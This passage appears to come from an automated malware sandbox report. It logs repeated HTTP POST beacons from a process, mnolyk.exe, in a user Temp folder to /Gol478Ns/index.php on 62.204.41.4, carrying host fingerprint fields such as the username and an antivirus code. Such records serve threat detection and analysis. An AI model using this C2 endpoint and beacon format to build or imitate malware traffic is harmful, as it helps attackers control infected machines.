                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.734966993 CET  695                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            507         192.168.2.4  50202        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:47.905015945 CET  695                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.970180035 CET  696                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            508         192.168.2.4  50203        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:48.140899897 CET  696                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.205348015 CET  697                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            509         192.168.2.4  50204        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:48.373919010 CET  697                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.437956095 CET  698                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            51          192.168.2.4  49746        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:39.277463913 CET  240                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.341696024 CET  240                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            510         192.168.2.4  50205        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:48.611499071 CET  698                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.676002026 CET  699                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            511         192.168.2.4  50206        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:48.861881971 CET  699                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.925546885 CET  700                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            512         192.168.2.4  50207        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:49.091510057 CET  700                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.157483101 CET  701                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            513         192.168.2.4  50208        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:49.326376915 CET  701                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.392637014 CET  702                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            514         192.168.2.4  50209        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:49.582808971 CET  702                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.647891998 CET  703                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            515         192.168.2.4  50210        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:49.826812983 CET  703                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.892420053 CET  704                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            516         192.168.2.4  50211        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:50.075216055 CET  704                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.142936945 CET  705                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            517         192.168.2.4  50212        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:50.310671091 CET  705                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.375612020 CET  706                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            518         192.168.2.4  50213        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:50.554965973 CET  706                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.619915962 CET  707                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            519         192.168.2.4  50214        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:50.800451040 CET  707                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.864557981 CET  708                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            52          192.168.2.4  49747        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:39.514163017 CET  241                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.576247931 CET  241                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            520         192.168.2.4  50215        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:51.044011116 CET  708                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.110352993 CET  709                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            521         192.168.2.4  50216        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:51.285754919 CET  709                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.350711107 CET  710                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            522         192.168.2.4  50217        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:51.538233042 CET  710                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.606420994 CET    711    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            523    192.168.2.4    50218    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:51.779999971 CET    711    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.845904112 CET    712    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            524    192.168.2.4    50219    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
                            Feb 8, 2023 17:39:52.017412901 CET    712    OUT    POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.084542036 CET    713    IN    HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID    Source IP    Source Port    Destination IP    Destination Port    Process
                            525    192.168.2.4    50220    62.204.41.4    80    C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp    kBytes transferred    Direction    Data
